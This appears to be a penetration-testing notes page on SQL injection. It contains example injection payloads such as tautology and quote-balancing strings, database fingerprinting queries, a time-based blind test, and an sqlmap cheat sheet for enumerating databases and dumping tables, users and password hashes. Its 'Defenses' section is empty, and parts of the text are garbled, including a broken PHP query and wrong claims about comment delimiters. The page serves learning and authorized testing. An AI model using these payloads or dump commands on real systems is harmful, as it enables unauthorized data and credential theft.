SQL Injection

What is it?

Common SQL Verbs

Common SQL Statement verbs

  • SELECT - Retrieves data from a table

  • INSERT - Adds data to a table

  • DELETE - Removes data from a data

  • UPDATE - Modifies data in a table

  • DROP - Delete a table

  • UNION - Combines data from multiple queries

SQL Query Modifiers


  • AND/OR

  • LIMIT #1, #2

  • ORDER BY #

Special Characters

  • ' and " - string delimiters

  • --, /*, and # - comment delimiters

  • *and % - comment delimiters

  • ; - Ends SQL statement

  • =


When attempting a SQL injection, we ideally want to input data that will cause a syntax error, then try to get normal result with additional characters, then we can input verbs or modifiers knowing it will run.

Sample server side code

$sql = "
FROM sers
WHERE lname='$_GET["name"]';

Normal input: Defender URL: http://test.com/sqli.php?name=Defender SQL Query: SELECT * FROM Users WHERE lname='Defender'; Results: Normal result

Injected Input: Defender' URL: http://test.com/sqli.php?name=Defender' SQL Query: SELECT * FROM Users WHERE lname='Defender''; Results: ' causes syntax error

Injected Input: Defender'; -- URL: http://test.com/sqli.php?name=Defender'; -- SQL Query: SELECT * FROM Users WHERE lname='Defender''; --; Results: Returns normal result

Injected Input: Defender' or 1=1; -- URL: http://test.com/sqli.php?name=Defender' or 1=1; -- SQL Query: SELECT * FROM Users WHERE lname='Defender' or 1=1; --; Results: Return all rows from Users table

Balancing a payload

Quote balancing

If commenting -- does not work. We can alternatively use string statements. Example Injection: Defender' OR 'a'='a .Example Statement: SELECT...WHERE lname='Defender' OR 'a'='a'; .

Column numbers balancing

INSERT and UNION statment require number of columns required or used

Data type balancing

INSERT and UNION statements require data type associated with columns to match


DB Fingerprinting

# Special Functions/paremeters
## MySQL or SQL Server:
SELECT @@version

# String concatenation
MySQL: 'Te' 'st'
MSSQL: 'Te'+'st'
Oracle 'Te'||'st'

# Unique numberic functions
MySQL: connection_id()
MSSQL: @@pack_received
Oracle: BITAND(1,1)

In-band SQL injection

Blind SQL injection

Test by sending input of test ' {sleep 10} then {sleep 20}. And see if server takes time to respond back.

Cheat Sheet

Displayed full SQL query as a value

info FROM information_schema.processlist



Open-source, python-based command line SQL injection tool created by Bernardo Damele A. G. (@#inquisdb)

See sqlmap extended help

sqlmap -hh

Test for vulnerability

sqlmap -r sqli.txt.raw 

Lists Database

sqlmap -r sqli.txt.raw  --dbs

With found database, lets list the tables

sqlmap -r sqli.txt.raw  --D Logins --tables

With found tables, list all columns

sqlmap -r sqli.txt.raw  --D Logins --T usernames --columns

Dump all records on a table

sqlmap -r sqli.txt.raw  --D Logins --T usernames --dump

Search all columns for a string (Example "pass")

sqlmap -r sqli.txt.raw --search -C pass

Per found table and columns, dump information of query

Within a pentest you don't want to dump sensitive information as it gets cached on your machine, instead of --dump you can use --count to see amount of entries, then --dump --start=1 --stop=3

sqlmap -r sqli.txt.raw -D secretdb -T password --dump

Alternatively, dump 38th entry

sqlmap -r sqli.txt.raw -D secretdb -T password --dump --where=pass=38

Grab user and password on database management system (Used to administer DB)

sqlmap -r sqli.txt.raw --users --passwords

SQL Injection Defenses


HUGE SQL injection cheat sheet: https://www.websec.ca/kb/sql_injection

NetSPI SQL injection wiki: https://sqlwiki.netspi.com/

Time-based Blind SQL Injection: https://www.sqlinjection.net/time-based/

OWASP Blind SQL injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection

NoSQL injections: https://medium.com/bugbountywriteup/nosql-injection-8732c2140576

swisskyrepo's guide to NoSQL Injections: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

Understanding GraphQL SQL Schemas and Types: https://graphql.org/learn/schema/

by3bl33d3r's MS SQL command Reference https://github.com/byt3bl33d3r/CrackMapExec/wiki/MSSQL-Command-Reference

Last updated